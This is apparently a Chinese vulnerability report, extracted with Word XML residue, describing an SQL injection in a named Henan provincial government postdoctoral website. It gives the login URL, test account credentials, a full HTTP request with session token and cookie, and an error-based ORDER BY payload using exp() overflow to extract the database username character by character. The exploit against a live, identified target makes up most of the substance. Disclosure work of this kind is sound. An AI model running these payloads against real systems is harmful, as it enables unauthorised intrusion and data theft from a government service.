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河南省人民政府某站存在SQL注入漏洞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地址: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"http://hnpostdoctor.hrss.henan.gov.cn/#/passport/login"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http://hnpostdoctor.hrss.henan.gov.cn/#/passport/login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, 可以注册账号进去, 我这里注册好一个 账号qwert123 密码qwert123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="239204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进去后点击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通知公告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会触发一个接口 /erupt-api/data/table/Notice, 此接口存在SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="635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POST /erupt-api/data/table/Notice HTTP/1.1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Host: hnpostdoctor.hrss.henan.gov.cn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Content-Length: 77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Accept: application/json, text/plain, */*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erupt: Notice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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36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token: AygbhVKtrC2AKaEw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Content-Type: application/json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Origin: http://hnpostdoctor.hrss.henan.gov.cn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Referer: http://hnpostdoctor.hrss.henan.gov.cn/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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: JSESSIONID=1D86EBEFA5AE6FCB6A914CB8B7ED0A9C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Connection: close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{"pageIndex":1,"pageSize":10,"sort":"sort"}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排序注入漏洞, 使用payload: "sort":"sort/exp(824-ascii(SUBSTRING(user(),1,1)))"报错, 因为mysql特性 exp(710)溢出报错 所以这里第一位用户名的ascii码为 824-710=114 对应字母 l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第二位 "sort":"sort/exp(821-ascii(SUBSTRING(user(),2,1)))" 报错 对应字母 i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第三位也是 i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"sort":"sort/exp(727-length(user()))" 这个是我跑了一下用户名长度 17位 有点长 我就跑到第4位吧 第四位是 n 证明存在SQL注入漏洞</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="279781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9781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0YWFiMWEzYzY5ODU4Y2I5NGM0Y2I2NTRjYjQ3ZWUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="57AA1E41"/>
    <w:rsid w:val="57AA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2023-02-14T18:48:00Z</dcterms:created>
  <dc:creator>WPS_1646995449</dc:creator>
  <cp:lastModifiedBy>WPS_1646995449</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-14T19:03:32Z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F0C210DA265D4015BC0B06630D5E9625</vt:lpwstr>
  </property>
</Properties>
</file>